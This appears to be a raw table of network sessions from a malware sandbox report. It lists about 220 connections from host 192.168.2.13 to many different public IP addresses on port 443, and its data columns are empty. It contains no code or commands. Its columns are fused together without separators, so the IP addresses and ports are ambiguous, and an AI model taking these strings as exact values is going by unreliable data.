                                                20610192.168.2.133611846.180.76.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20611192.168.2.1338802195.156.10.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20612192.168.2.1339882223.122.205.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20613192.168.2.1350086172.95.14.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20614192.168.2.1348238133.74.44.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20615192.168.2.134494849.135.161.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20616192.168.2.1357596123.15.11.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20617192.168.2.1346156118.44.98.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20618192.168.2.1347250135.155.175.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20619192.168.2.13486125.185.34.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20620192.168.2.1357032103.216.90.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20621192.168.2.133680670.117.6.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20622192.168.2.133740689.212.249.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20623192.168.2.1353444202.164.102.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20624192.168.2.135691823.205.160.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20625192.168.2.133343657.214.102.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20626192.168.2.1347458159.48.150.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20627192.168.2.1360796195.217.157.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20628192.168.2.1354462221.14.188.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20629192.168.2.135691035.109.140.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20630192.168.2.1340696141.2.150.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20631192.168.2.134347870.11.22.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20632192.168.2.1357278114.180.134.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20633192.168.2.1342760109.97.62.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20634192.168.2.135480879.35.72.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20635192.168.2.134691248.132.53.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20636192.168.2.1351828126.206.34.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20637192.168.2.1349050212.33.226.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20638192.168.2.1358952109.108.105.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20639192.168.2.1355572148.28.235.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20640192.168.2.135547444.18.208.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20641192.168.2.135527248.80.73.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20642192.168.2.1335814128.131.227.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20643192.168.2.1345048105.22.228.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20644192.168.2.1343034200.48.115.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20645192.168.2.1356644219.239.39.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20646192.168.2.1343018164.7.137.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20647192.168.2.1356262186.56.131.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20648192.168.2.135760873.35.199.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20649192.168.2.133753887.51.24.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20650192.168.2.1333668146.48.103.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20651192.168.2.135811865.74.192.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20652192.168.2.1342676133.189.110.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20653192.168.2.1350762134.74.62.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20654192.168.2.13601802.2.153.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20655192.168.2.1358052163.227.107.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20656192.168.2.1340968115.7.27.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20657192.168.2.1342112192.171.32.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20658192.168.2.1337466154.107.15.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20659192.168.2.1349764122.219.238.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20660192.168.2.1354042165.216.192.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20661192.168.2.134532497.179.75.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20662192.168.2.1357460100.185.236.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20663192.168.2.1353406131.241.105.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20664192.168.2.134261690.133.110.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20665192.168.2.134726698.149.239.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20666192.168.2.1357126129.230.89.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20667192.168.2.133653267.215.218.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20668192.168.2.133710627.176.28.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20669192.168.2.1336790201.144.137.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20670192.168.2.1351580124.133.208.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20671192.168.2.1333904119.167.144.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20672192.168.2.1334482156.81.162.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20673192.168.2.1351078183.132.17.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20674192.168.2.133862069.30.147.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20675192.168.2.133740885.200.76.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20676192.168.2.1337536219.219.49.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20677192.168.2.1353292158.30.57.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20678192.168.2.1337670194.124.40.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20679192.168.2.1358802161.228.247.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20680192.168.2.133610418.71.30.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20681192.168.2.134879078.65.202.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20682192.168.2.1357742192.157.11.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20683192.168.2.1346122179.86.223.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20684192.168.2.1336410149.100.19.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20685192.168.2.1353292161.19.120.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20686192.168.2.1354204181.123.53.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20687192.168.2.134961637.234.63.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20688192.168.2.133354457.107.4.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20689192.168.2.135549280.236.179.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20690192.168.2.1345706133.249.217.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20691192.168.2.134446468.170.240.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20692192.168.2.133804092.238.198.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20693192.168.2.1336456121.255.240.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20694192.168.2.1354458155.156.155.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20695192.168.2.134712064.168.108.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20696192.168.2.1337470126.59.127.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20697192.168.2.1357060112.127.39.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20698192.168.2.1348180100.217.193.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20699192.168.2.133365213.202.102.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20700192.168.2.1351524103.191.112.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20701192.168.2.135061257.13.80.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20702192.168.2.1360346157.253.175.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20703192.168.2.1353970204.165.25.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20704192.168.2.1359840121.16.163.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20705192.168.2.1346618170.86.43.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20706192.168.2.1357610151.227.15.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20707192.168.2.1360080195.185.164.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20708192.168.2.13584261.52.251.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20709192.168.2.1339272131.77.115.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20710192.168.2.134836061.1.35.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20711192.168.2.1351116100.173.208.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20712192.168.2.1332768119.234.156.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20713192.168.2.1347204198.37.213.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20714192.168.2.134460676.225.165.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20715192.168.2.1333068121.140.18.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20716192.168.2.1340814149.140.23.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20717192.168.2.1336098146.96.75.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20718192.168.2.1345612180.232.221.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20719192.168.2.1357718189.131.109.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20720192.168.2.136012834.34.241.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20721192.168.2.1347384135.118.247.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20722192.168.2.1357114179.111.24.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20723192.168.2.134867042.109.226.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20724192.168.2.1335858155.4.163.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20725192.168.2.134260417.235.220.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20726192.168.2.1352884222.119.157.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20727192.168.2.1344510161.219.90.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20728192.168.2.1336686102.84.208.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20729192.168.2.1351664207.142.66.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20730192.168.2.135700417.208.2.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20731192.168.2.1356074158.77.38.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20732192.168.2.135509417.215.81.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20733192.168.2.133389464.180.233.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20734192.168.2.1341252162.240.77.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20735192.168.2.1350830174.84.115.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20736192.168.2.133745835.69.136.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20737192.168.2.1341084185.76.217.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20738192.168.2.1357962148.154.90.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20739192.168.2.133935453.47.210.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20740192.168.2.134587227.113.9.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20741192.168.2.13541928.3.202.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20742192.168.2.134907220.113.136.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20743192.168.2.1351954122.157.150.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20744192.168.2.1356174175.247.83.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20745192.168.2.1334536119.42.163.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20746192.168.2.134139236.213.13.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20747192.168.2.1358160152.60.25.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20748192.168.2.1359142143.71.131.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20749192.168.2.13576568.195.116.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20750192.168.2.134530072.155.237.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20751192.168.2.135168449.175.225.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20752192.168.2.1349042121.129.42.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20753192.168.2.1345414107.12.57.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20754192.168.2.1340332164.15.84.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20755192.168.2.1355582147.11.83.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20756192.168.2.135720451.49.111.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20757192.168.2.1339348219.247.190.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20758192.168.2.134821898.34.131.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20759192.168.2.1332800134.71.135.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20760192.168.2.135991473.232.161.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20761192.168.2.134367442.81.98.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20762192.168.2.1348380157.202.65.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20763192.168.2.135110238.101.5.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20764192.168.2.1355800160.86.210.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20765192.168.2.1339390138.243.94.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20766192.168.2.1340718181.91.210.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20767192.168.2.1355238202.72.140.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20768192.168.2.1353182190.219.165.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20769192.168.2.133712049.177.65.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20770192.168.2.133812820.24.212.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20771192.168.2.134517695.245.23.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20772192.168.2.133645025.1.60.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20773192.168.2.136019841.171.30.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20774192.168.2.135832894.160.167.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20775192.168.2.1346338166.125.168.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20776192.168.2.135891476.77.247.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20777192.168.2.134284424.255.107.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20778192.168.2.1343010152.178.6.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20779192.168.2.13340208.184.249.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20780192.168.2.1339208157.209.166.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20781192.168.2.1332916135.52.176.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20782192.168.2.1349706103.226.17.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20783192.168.2.1335442136.81.136.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20784192.168.2.134814671.143.155.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20785192.168.2.134566099.85.7.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20786192.168.2.1343654168.94.254.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20787192.168.2.134652068.215.105.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20788192.168.2.1347620100.4.63.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20789192.168.2.1352930212.240.77.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20790192.168.2.1334280117.105.157.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20791192.168.2.1359768140.210.46.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20792192.168.2.1336882162.140.190.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20793192.168.2.1358342223.148.179.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20794192.168.2.134331297.63.102.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20795192.168.2.1352428103.15.137.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20796192.168.2.1338694165.171.48.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20797192.168.2.135760871.235.115.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20798192.168.2.1352924103.87.156.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20799192.168.2.136090865.169.51.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20800192.168.2.134364023.117.68.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20801192.168.2.1343292138.205.63.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20802192.168.2.13427801.178.96.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20803192.168.2.1340942115.252.0.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20804192.168.2.135489612.160.141.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20805192.168.2.134618254.77.119.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20806192.168.2.135686297.246.238.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20807192.168.2.13427489.225.249.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20808192.168.2.135776019.27.184.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20809192.168.2.133643248.180.14.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20810192.168.2.134670639.178.115.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20811192.168.2.1340672165.53.81.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20812192.168.2.1333294136.66.255.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20813192.168.2.136034863.241.201.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20814192.168.2.1357116166.2.48.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20815192.168.2.1356346196.239.182.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20816192.168.2.135951813.76.166.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20817192.168.2.135872437.243.213.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20818192.168.2.1350674180.183.239.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20819192.168.2.134616035.246.7.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20820192.168.2.136013640.190.198.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20821192.168.2.133300019.216.160.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20822192.168.2.135661684.192.46.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20823192.168.2.134019881.163.100.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20824192.168.2.1357294163.107.197.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20825192.168.2.1334136106.172.102.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20826192.168.2.1354278150.49.213.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20827192.168.2.1359444156.186.59.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20828192.168.2.134463893.253.227.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20829192.168.2.135177488.238.87.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20830192.168.2.134370468.37.7.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20831192.168.2.1353752158.93.223.74443
                                                TimestampBytes transferredDirectionData


